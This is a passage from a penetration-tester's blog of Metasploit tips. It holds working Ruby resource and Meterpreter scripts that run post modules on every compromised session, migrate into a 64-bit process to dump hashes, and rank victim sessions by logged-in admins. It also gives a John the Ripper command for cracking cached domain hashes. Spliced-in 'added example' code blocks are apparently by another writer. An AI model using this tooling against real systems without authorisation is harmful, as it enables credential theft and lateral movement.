Room362.com

Blatherings of a security addict.

12 Days of No Starch Press


This Christmas I’ve decided to spread a little cheer (aka free stuff) ;-), and I’m doing it in 2600 fashion. Now, I don’t know if I have enough readers to pull this off, but here goes:

I will be sending one No Starch book of the winner’s choice each day for 12 days starting on December 1st. Here’s the catch: to win a book you must submit a picture of a door or room that is unmistakably ‘Room 362’. The only other stipulation is that the image must be original (meaning if I look it up on TinEye it doesn’t come back with any hits).

Once you win you’ll be taken out of the running for the remaining days, but if you submit a picture tomorrow you’ll be eligible to win on all 12 days. Also, the more original pictures you submit, the better your chances.

How do you submit? Great question. Simply tag Room362’s Google+ page in the photo.

And since Google+’s stupid badges require header changes you can just click on this icon:

This will be paid for out of my own pocket and the books will be ordered new (not second hand from my bookshelf), so I may ask you to choose another book if your pick is a $200 box set or something like that.

Why No Starch? Well, I’ll leave that up to you to speculate.

No Starch Press

Update on 2011-11-28 00:04 by Rob Fuller

  1. Yes, I’m ok with international shipping, but if you’re outside the US the book may not arrive before Christmas.

  2. Funny, inventive, crazy, artistic, cool, etc. are all pluses.

Run POST Modules on All Sessions


Jcran recently blogged about an easy way to run a post module on all sessions:

http://blog.pentestify.com/simple-framework-domain-token-scanner

msf> use post/windows/gather/enum_domain_tokens
msf enum_domain_tokens> irb
framework.sessions.each do |session|
  run_single("set SESSION #{session.first}")
  run_single("run")
  sleep 1
end

You use the POST module, drop to irb, paste that loop, and bam, you win. With resource files we can automate this a bit more so that it works effortlessly with any post module.

Thinking back to http://blog.metasploit.com/2010/03/automating-metasploit-console.html and my rapid-fire PSEXEC resource file, we know we can run Ruby inside resource files by wrapping it in the <ruby> tag.

Save the following as runall.rc somewhere where you’ll remember:

<ruby>
# Run the currently selected post module against every open session.
# framework, active_module, run_single and print_status are the bindings
# msfconsole gives resource-file Ruby.
framework.sessions.each do |session|
  run_single("set SESSION #{session.first}")
  print_status("Running #{active_module.fullname} against session #{session.first}")
  run_single("run")
  sleep 1
end
</ruby>

Then when you want to run a POST module against every session you have you simply do:

msf> use post/windows/gather/enum_domain_tokens
msf enum_domain_tokens> resource runall.rc
[*] Running post/windows/gather/enum_domain_tokens against session 1

Update on 2011-11-06 20:05 by Rob Fuller

A commenter spotted a cross-version compatibility error in the code. The following should work better across versions:

<ruby>
# each_key hands us the session id directly, which behaves the same on
# every Ruby/Metasploit version the original each/first form did not.
framework.sessions.each_key do |session|
  run_single("set SESSION #{session}")
  print_status("Running #{active_module.fullname} against session #{session}")
  run_single("run")
  sleep 1
end
</ruby>
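One thing the loop above does not do is check whether the module can actually run on a given session: a plain shell session fed to a meterpreter-only post module just errors out. The following is an added example (mine, not code from the original post or from Metasploit) of a runall.rc that skips those sessions and reports what it ran. Save it inside <ruby> ... </ruby> as before. It keeps the loop itself in a plain method that takes the things it needs, so the logic also runs outside msfconsole; framework, active_module, run_single and print_status are the resource-file bindings the original runall.rc uses, and session_compatible? is assumed to exist on the post module (current Metasploit has it; if a build lacks it, the respond_to? guard falls back to running against every session).

```ruby
# Added example: runall.rc with a per-session compatibility check.
# Not from the original post; see the lead-in for what it assumes.

# Decide which session IDs to run against and run them.
#   sessions   - hash of session id => session object
#   compatible - callable(session) -> true/false
#   runner     - callable(session id) that sets SESSION and runs the module
#   delay      - seconds to pause between sessions (nil for none)
# Returns { ran: [ids], skipped: [ids] } in ascending session-id order.
def run_post_on_sessions(sessions, compatible, runner, delay = nil)
  result = { ran: [], skipped: [] }
  sessions.keys.sort.each do |sid|
    unless compatible.call(sessions[sid])
      result[:skipped] << sid
      next
    end
    runner.call(sid)
    result[:ran] << sid
    sleep(delay) if delay
  end
  result
end

# Only executed inside msfconsole, where the resource-file bindings exist.
if defined?(framework) && defined?(active_module)
  mod = active_module
  # session_compatible? is assumed; fall back to "try everything" without it.
  compat = lambda do |sess|
    mod.respond_to?(:session_compatible?) ? mod.session_compatible?(sess) : true
  end
  runner = lambda do |sid|
    print_status("Running #{mod.fullname} against session #{sid}")
    run_single("set SESSION #{sid}")
    run_single("run")
  end
  r = run_post_on_sessions(framework.sessions, compat, runner, 1)
  print_status("Done: ran on #{r[:ran].inspect}, skipped #{r[:skipped].inspect}")
end
```

Usage is the same as before: `use` a post module, then `resource runall.rc`. The skipped list at the end tells you which sessions still need a different module (or an upgrade to meterpreter) rather than leaving you to spot the errors in the scrollback.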

MSFConsole Prompt Fiddling


In @carnal0wnage’s and my presentation at DerbyCon 2011 we talked about using screen and script to keep connections alive, use them across SSH sessions, and log everything that happens. What we didn’t cover is that those logs carry no timestamps. Now, Metasploit has multiple ways of creating logs:

  • cat ~/.msf4/logs/framework.log
    • This log automatically records all of the error data, which is great for troubleshooting when something isn’t working, but it doesn’t record what you are doing inside msfconsole.
  • msf> spool ~/myclient.log
    • The spool command is great for logging output from anything you do in either consoles or sessions, even when you drop to a shell. My one gripe is that it doesn’t log the actual command you issued.
  • The console and session logging options:

msf> set ConsoleLogging true
msf> set LogLevel 5
msf> set SessionLogging true
msf> set TimestampOutput true

    • Combined, these do essentially the same thing as spool except that they go into different logs, and they do actually log the command you issued.

Plenty of logging, right? But none of them really ‘logs everything’, and timestamps are not a regular occurrence in them. We need both. We’ve got the ‘log everything’ part with the Linux script command; we just need a way to inject timestamps into that log.


Enter the ever mutable ‘msf>’ prompt:


A lesser-known variable in msfconsole is PROMPT. You can set it much like you would set a shell prompt on any OS, but there are some Metasploit-specific tokens you can add, and using a three-letter abbreviation you can even add color to it.

For example lets add our hostname to our prompt:

msf> set PROMPT %H

changes msf> to myhostname>

And you can combine and add things that you wish:

set PROMPT %H Just more text %U

changes the prompt to: myattackmachine Just more text mubix> (%U is username)

For reference here are the other working % variables that I know of:

  • %D = Current local directory (not sure whether this changes to the victim’s directory when in meterpreter; that would be cool)
  • %H = Host name (again, would be cool if this changed when in meterpreter)
  • %J = Current number of jobs running
  • %L = Local IP (makes it easy to remember what to put in LHOST)
  • %S = Current number of sessions open
  • %T = Time stamp
  • %U = Username (yes, it would be awesome if this changed in meterpreter too)

Now if you want to add colors, use something like %grn%T to make the timestamp green. You’ll have to play around with the color names as I don’t know them all: %red, %blu, %blk, etc.

Combine all of that with script and you’ve got something awesome. I set my PROMPT to:

msf> set PROMPT %T S:%S J:%J
1970-01-01 00:00:00 +0000 S:0 J:0>

This gives me the number of jobs and sessions and a timestamp every time I issue a command, so in my logs I can very easily narrow down the exact time when I did or didn’t do something. The number of sessions and jobs are just good-to-know items.
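Here is what that buys you when you come back to the typescript later. The following is an added example (mine, not from the original post): it pulls every command you typed, with its timestamp and the session/job counts, back out of a script log by matching the prompt layout above, strips the ANSI color codes that %grn-style prompts leave in the file, and lets you ask "what did I run between 14:05 and 14:07?". The typescript it parses is constructed for the example and simplified (a real one also contains readline redraws and other terminal noise); the regex is pinned to the exact PROMPT format from the post, so adjust it if you use a different one.

```ruby
# Added example: recover timestamped msfconsole commands from a `script`
# typescript written with PROMPT set to "%T S:%S J:%J".  Not from the post.
require 'time'

# "YYYY-MM-DD HH:MM:SS +ZZZZ S:<n> J:<n>> <command>", anchored at line start.
PROMPT_RE = /\A(\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2} [+-]\d{4}) S:(\d+) J:(\d+)> ?(.*)\z/

# Remove ANSI colour sequences (from %grn-style prompt colours) and CRs.
def clean_typescript(text)
  text.gsub(/\e\[[0-9;]*m/, '').delete("\r")
end

# One hash per prompt line that actually carries a command:
#   { time: Time, sessions: Integer, jobs: Integer, command: String }
def msf_commands(typescript)
  clean_typescript(typescript).each_line.map do |line|
    m = PROMPT_RE.match(line.chomp)
    next if m.nil? || m[4].empty?     # output lines and empty prompts
    { time: Time.strptime(m[1], '%Y-%m-%d %H:%M:%S %z'),
      sessions: m[2].to_i, jobs: m[3].to_i, command: m[4] }
  end.compact
end

# Commands issued inside the closed interval [from, to] (Time objects).
def msf_commands_between(typescript, from, to)
  msf_commands(typescript).select { |c| c[:time].between?(from, to) }
end

# Constructed sample typescript (not a real log).
SAMPLE_TYPESCRIPT = [
  'Script started on Mon 03 Oct 2011 14:04:58 UTC',
  '2011-10-03 14:05:12 +0000 S:0 J:0> use exploit/multi/handler',
  # %grn%T renders the stamp in green; the escape codes land in the log.
  "\e[32m2011-10-03 14:05:40 +0000\e[0m S:0 J:0> set PAYLOAD windows/meterpreter/reverse_tcp\r",
  'PAYLOAD => windows/meterpreter/reverse_tcp',
  '2011-10-03 14:06:02 +0000 S:0 J:0> exploit -j',
  '[*] Exploit running as background job.',
  '[*] Started reverse handler on 192.0.2.10:4444',
  '2011-10-03 14:09:31 +0000 S:1 J:1> sessions -l',
  '2011-10-03 14:09:31 +0000 S:1 J:1> ',
].join("\n") + "\n"

if $PROGRAM_NAME == __FILE__
  msf_commands(SAMPLE_TYPESCRIPT).each do |c|
    puts "#{c[:time].iso8601}  S:#{c[:sessions]} J:#{c[:jobs]}  #{c[:command]}"
  end
end
```

Point it at a real typescript with `msf_commands(File.read('typescript'))`. Because the stamp comes from the prompt, the time recorded is when the prompt was drawn, i.e. when the previous command finished, so treat it as "no later than" the moment you typed the next one.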


Throw in one more trick to make the whole thing a cake walk:


In your ~/.msf4 directory, if you haven’t already, create a file called ‘msfconsole.rc’. This magical file runs every time you start msfconsole (with the express exception of when you specify a resource file from the command line using the -r argument). Throw your ‘set PROMPT %blah %blah %blah’ in there formatted however you like, and whenever you start msfconsole you’ll have your handy dandy timestamp.

Shout out to @egyp7 for showing me this.

Create a 64bit Process From a X86/32bit One


On Vista and above there is a Windows ‘redirector’ (more info here): a virtual directory, Sysnative, that only 32-bit processes running under WOW64 can see and that points at the real 64-bit System32 (when a 32-bit process asks for System32 it is silently redirected to SysWOW64 instead). That is what lets a 32-bit process create a 64-bit one. Anyone who has tried ‘execute -H -c -f notepad.exe’ from a 32-bit process knows they get a 32-bit notepad even on a 64-bit system, which is annoying. So if you don’t want to read the link above, you can create a stable 64-bit notepad.exe by doing the following:

execute -H -c -f "C:\\WINDOWS\\Sysnative\\notepad.exe"

Now you can migrate into that notepad; Metasploit/Meterpreter will handle not only the network socket switch but the upgrade to a 64-bit process. You should now be able to dump hashes like I talked about (here).

Of course you need to change the drive and Windows directory to match your target (language and base drive changes apply), but the rest should work as prescribed.
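Rather than editing the drive and Windows directory by hand, a Meterpreter script can ask the target for its real %SystemRoot% and decide for itself whether Sysnative is needed. The following is an added example (mine, not from the original post or from Metasploit) that does exactly that: Sysnative is only visible to a 32-bit process on a 64-bit host, so a 64-bit meterpreter, or a 32-bit one on a 32-bit host, must use System32. The sysinfo keys ‘Architecture’ and ‘Meterpreter’, client.fs.file.expand_path, client.sys.process.execute and client.core.migrate are assumed from the Meterpreter Ruby API; the sample sysinfo hashes are constructed.

```ruby
# Added example: pick Sysnative vs System32 from the session's own sysinfo.
# Not from the post; see the lead-in for the API assumptions.

# True when this is a 32-bit Meterpreter on a 64-bit Windows host (WOW64),
# i.e. the only case in which the Sysnative redirector exists.
def wow64_session?(sysinfo)
  host64 = sysinfo['Architecture'].to_s =~ /x64|x86_64|amd64/i
  met32  = sysinfo['Meterpreter'].to_s =~ /\Ax86\//i
  !!(host64 && met32)
end

# Full path to run `exe` as a native (non-WOW64) process.
# system_root is the target's Windows directory, e.g. "C:\\Windows".
def native_exe_path(system_root, exe, sysinfo)
  dir = wow64_session?(sysinfo) ? 'Sysnative' : 'System32'
  "#{system_root.chomp('\\')}\\#{dir}\\#{exe}"
end

# Constructed examples of what client.sys.config.sysinfo returns.
X86_ON_X64 = { 'Architecture' => 'x64', 'Meterpreter' => 'x86/windows' }
X64_ON_X64 = { 'Architecture' => 'x64', 'Meterpreter' => 'x64/windows' }
X86_ON_X86 = { 'Architecture' => 'x86', 'Meterpreter' => 'x86/windows' }

# Inside a Meterpreter script or post module `client` is the session; the
# block below only runs there.
if defined?(client)
  info = client.sys.config.sysinfo
  root = client.fs.file.expand_path('%SystemRoot%')   # real Windows dir, any drive/locale
  path = native_exe_path(root, 'notepad.exe', info)
  spawned = client.sys.process.execute(path, nil, 'Hidden' => true, 'Channelized' => true)
  print_status("Spawned #{path} as PID #{spawned.pid}, migrating")
  client.core.migrate(spawned.pid)
end
```

On an x86-on-x64 session this yields C:\Windows\Sysnative\notepad.exe (with whatever drive and directory the target actually uses); on a native 64-bit session it yields the System32 path, since Sysnative does not exist there.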

#DerbyCon Approaches…


Chris Gates (@carnal0wnage) and I will be speaking at DerbyCon next week:

The Dirty Little Secrets They Didn’t Teach You In Pentesting Class

“This talk is about methodologies and tools that we use or have coded that make our lives and pentest schedule a little easier, and why we do things the way we do. Of course, there will be a healthy dose of Metasploit in the mix. ”

Who Is Logged in? A Quick Way to Pick Your Targets


Say you go for the 500+ shells on an internal test, or your phishing exercise goes way better than you thought. Well, you need to get your bearings quickly, and going into each shell, doing a ps, then looking through the list for all the users logged in is a bit of a pain and definitely not ideal.

I wrote a quick script that you can throw in the meterpreter scripts folder to aid you a bit with this:

# Collect the owner of every process on the host; processes whose owner
# could not be read come back with no user, so coerce to a string.
users = []
client.sys.process.each_process do |x|
  users << x["user"].to_s
end

users.sort!
users.uniq!
users.delete_if { |x| x =~ /^NT AUTHORITY/ }   # SYSTEM, LOCAL/NETWORK SERVICE
users.delete_if { |x| x == "" }                 # processes with no readable owner
loggedin = users.join(', ')
print_status(loggedin)

All it does is automate the process described above; used in concert with the ‘sessions -s’ command it makes life a bit easier:

msf  post(enum_logged_on) > sessions -s loggedin
[*] Running script loggedin on all sessions...
[*] Session 1 (victimgatewayaddress:21638):
[*] DOMAIN\User1
[*] Session 2 (victimgatewayaddress:39900):
[*] DOMAIN\AdminUser1
[*] Session 3 (victimgatewayaddress:59395):
[*] DOMAIN\User5
[*] Session 5 (victimgatewayaddress:21639):
[*] DOMAIN\User20
[*] Session 6 (victimgatewayaddress:21640):
[*] COMPUTERNAME\Administrator, DOMAIN2\AdminUser7
[*] Session 7 (victimgatewayaddress:39901):
[*] DOMAIN\User55

You can see from this output that I probably want to start with session 2, and probably 6 as well, as it seems to be on another domain and has an admin to boot. The example is small, but on a larger scale this starts to matter a lot for time management. I’m sure some of you out there have realized, after spending hours with one session, that you had another with a DA (domain admin) signed into it on a different system.

Just a disclaimer, this ONLY shows who is logged into the sessions you have, not remote systems.
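With a few hundred sessions, even the per-session list above is too long to eyeball, so the next step is to sort it. The following is an added example (mine, not from the original post): it applies the same user-harvesting logic as the loggedin script to the process lists of several sessions at once, then orders the sessions so the ones worth looking at first come out on top. The process hashes are constructed but mirror the ‘pid’/‘name’/‘user’ keys that client.sys.process.each_process yields; the scoring rule (admin-looking account names and extra domains push a session up) is this example’s own heuristic and not something the post prescribes, and a user called AdminUser is of course not necessarily an administrator.

```ruby
# Added example: rank sessions by who is logged in.  Not from the post;
# the scoring rule is a labelled heuristic.

# Built-in accounts that are not real logons.
SYSTEM_ACCOUNTS = /\A(NT AUTHORITY|NT SERVICE|Window Manager|Font Driver Host)\\/i

# Distinct, sorted accounts that own at least one process on the host
# (same filtering as the loggedin script, plus a few more built-ins).
def logged_in_users(processes)
  processes.map { |p| p['user'].to_s }
           .reject { |u| u.empty? || u =~ SYSTEM_ACCOUNTS }
           .uniq
           .sort
end

# Heuristic score: 10 per admin-looking account name, plus 1 per distinct
# domain/machine seen.  Assumption of this example, not authoritative.
def session_score(users)
  admins  = users.count { |u| u.split('\\').last =~ /admin/i }
  domains = users.map { |u| u.split('\\').first }.uniq.size
  admins * 10 + domains
end

# sessions: { session id => array of process hashes }.
# Returns [[sid, users], ...] best-first; ties broken by session id.
def triage_sessions(sessions)
  sessions.map { |sid, procs| [sid, logged_in_users(procs)] }
          .sort_by { |sid, users| [-session_score(users), sid] }
end

# Constructed sample data (shape of each_process output, made up values).
SAMPLE_SESSIONS = {
  1 => [{ 'pid' => 4,    'name' => 'System',       'user' => 'NT AUTHORITY\\SYSTEM' },
        { 'pid' => 1204, 'name' => 'explorer.exe', 'user' => 'DOMAIN\\User1' }],
  2 => [{ 'pid' => 1336, 'name' => 'explorer.exe', 'user' => 'DOMAIN\\AdminUser1' },
        { 'pid' => 620,  'name' => 'svchost.exe',  'user' => 'NT AUTHORITY\\NETWORK SERVICE' }],
  6 => [{ 'pid' => 988,  'name' => 'cmd.exe',      'user' => 'COMPUTERNAME\\Administrator' },
        { 'pid' => 2120, 'name' => 'mmc.exe',      'user' => 'DOMAIN2\\AdminUser7' },
        { 'pid' => 1500, 'name' => 'smss.exe',     'user' => '' }],
}

if $PROGRAM_NAME == __FILE__
  triage_sessions(SAMPLE_SESSIONS).each do |sid, users|
    puts "Session #{sid}: #{users.join(', ')}"
  end
end
```

Inside Metasploit you would build the sessions hash by iterating framework.sessions and calling each meterpreter session’s sys.process.get_processes; the ranking is then a one-liner. As with the script itself, this only tells you who has a process on the boxes you already own, not who is logged in elsewhere.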

Disconnect Stalled SSH Session


This doesn’t really apply to Windows users, as you can just close PuTTY. But for everyone else, stalled SSH sessions suck. You either slam Enter to get it to realize it’s been disconnected or just wait for it to. Well, for those of us who are impatient, just hit:

~.

That’s right: Shift + the key above Tab (tilde), release, then hit the period. SSH only recognizes the escape character at the beginning of a line, so you may have to hit Enter first to get there, but do that and it will disconnect the SSH session right away. (~? lists the other escape sequences.)

Stupid trick, but I use it all the time (especially on spotty MiFi connections).

Multiple Dictionaries or Wordlists Using John the Ripper


John the Ripper only takes one wordlist at a time. There are plenty of docs out there that show you how to cat all of your dictionaries into John’s stdin mode, but I like to run rules against my lists and I didn’t see any how-tos on doing that. Here is my way:

ls dicts | xargs -t -I file ./john --pot=victim.pot --format=mscash --wordlist=dicts/file --rules victim_cachedump.txt

This command lists the ‘dicts’ directory and pipes the listing to xargs, which prints each command before running it (-t) and replaces every occurrence of the word file with the current line of input (-I file). Then it’s just your standard John arguments. Note that with -I, xargs treats each line as one item, so names with spaces are fine; the shared --pot file is what stops each run from re-cracking what the previous wordlist already got.

Post Exploitation Command Lists


I’ve had a private list of commands that I run on Windows or Linux when I pop a shell, as I’m sure most pentesters do. It isn’t so much hoarding as it is just jumbled notes that are ‘not worth posting’.

Well, I made two (now five) public Google Docs (anyone can edit) *don’t be a dick clause

Linux/Unix/BSD Post Exploitation: https://docs.google.com/document/d/1ObQB6hmVvRPCgPTRZM5NMH034VDM-1N-EWPRz2770K4/edit?hl=en_US

Windows Post Exploitation: https://docs.google.com/document/d/1U10isynOpQtrIK6ChuReu-K1WHTJm4fgG3joiuz43rw/edit?hl=en_US

OSX Post Exploitation: https://docs.google.com/document/d/10AUm_zUdAQGgoHNo_eS0SO1K-24VVYnulUD2x3rJD3k/edit?hl=en_US

and the newly added Obscure Systems Post Exploitation: https://docs.google.com/document/d/1CIs6O1kMR-bXAT80U6Jficsqm0yR5dKUfUQgwiIKzgc/edit

and Metasploit Post Exploitation: https://docs.google.com/document/d/1ZrDJMQkrp_YbU_9Ni9wMNF2m3nIPEA_kekqqqA2Ywto/edit

They have all filled out A LOT since I first posted them, but if you have that one trick command you’d like to share, or just want to copy/print the list for your own uses, that’s fine too. I plan to keep these publicly editable as long as people obey the DBAD clause.

If you don’t know any cool commands but happen to be a tech writer and can make it look beautiful, then great! Please do. There are tables at the bottom that I want to move everything to, or something like it, but if you can do it better…

Anyways, look forward to seeing how this thing grows.